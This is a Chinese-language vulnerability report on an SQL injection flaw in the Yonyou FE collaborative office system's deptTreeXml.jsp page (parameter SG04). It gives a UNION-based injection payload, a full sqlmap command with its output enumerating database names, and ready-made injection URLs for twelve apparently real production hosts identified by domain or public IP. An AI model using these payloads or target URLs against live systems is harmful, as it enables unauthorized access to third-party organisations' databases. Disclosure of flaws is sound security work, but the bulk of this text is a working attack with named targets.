漏洞详情

用友FE协作办公系统某处过滤不严,导致SQL注入漏洞,可直接union注入

注入链接:/system/config/deptTreeXml.jsp?type=group&SG04=1

注入参数:SG04

Payload:SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

Sqlmap注入:python sqlmap.py -u 'http://xxxx/system/config/deptTreeXml.jsp?type=group&SG04=1' -p SG04 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=24 --dbs  --threads 10 --batch -v 1

漏洞证明:

(1)http://oa.hzuf.com:9090

http://oa.hzuf.com:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

Sqlmap注入:

$ python sqlmap.py -u 'http://oa.hzuf.com:9090/system/config/deptTreeXml.jsp?type=group&SG04=1' -p SG04 --dbms mssql --level 5 --risk 3 --technique=U --dbs  --threads 10 --batch -v 1

---

Place: GET

Parameter: SG04

    Type: UNION query

    Title: Generic UNION query (NULL) - 24 columns

    Payload: type=group&SG04=1' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,CHAR(113)+CHAR(97)+CHAR(109)+CHAR(98)+CHAR(113)+CHAR(106)+CHAR(99)+CHAR(107)+CHAR(76)+CHAR(86)+CHAR(79)+CHAR(71)+CHAR(90)+CHAR(80)+CHAR(87)+CHAR(113)+CHAR(104)+CHAR(111)+CHAR(101)+CHAR(113),32,32,32,32,32,32,32,32--

---

[09:59:15] [INFO] testing Microsoft SQL Server

[09:59:15] [INFO] confirming Microsoft SQL Server

[09:59:15] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: Servlet 2.4, Tomcat 4.0.4., JSP

back-end DBMS: Microsoft SQL Server 2005

[09:59:15] [INFO] fetching database names

available databases [11]:

[*] FE_APP5

[*] FE_BASE5

[*] FE_ERP

[*] master

[*] model

[*] msdb

[*] ncdb

[*] oa

[*] ReportServer

[*] ReportServerTempDB

[*] tempdb
	

1.png

(2)http://220.168.210.109:9090

http://220.168.210.109:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

2.png

(3)http://119.145.194.122:9090

http://119.145.194.122:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

3.png

(4)http://fsd2014.f3322.org:9090/

http://fsd2014.f3322.org:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

4.png

(5)http://oa.chnjcdc.com:9090

http://oa.chnjcdc.com:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

5.png

(6)http://120.237.156.46:8088/

http://120.237.156.46:8088/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(7)http://ai-oa.allan.com.cn:9090/

http://ai-oa.allan.com.cn:9090/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(8)http://183.129.249.246:9090

http://183.129.249.246:9090/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(9)http://218.205.208.22:9090

http://218.205.208.22:9090/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(10)http://120.196.116.3:7321

http://120.196.116.3:7321/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(11)http://fe.hy-la.com:8088

http://fe.hy-la.com:8088/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(12)http://220.168.210.109:9090

http://220.168.210.109:9090/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png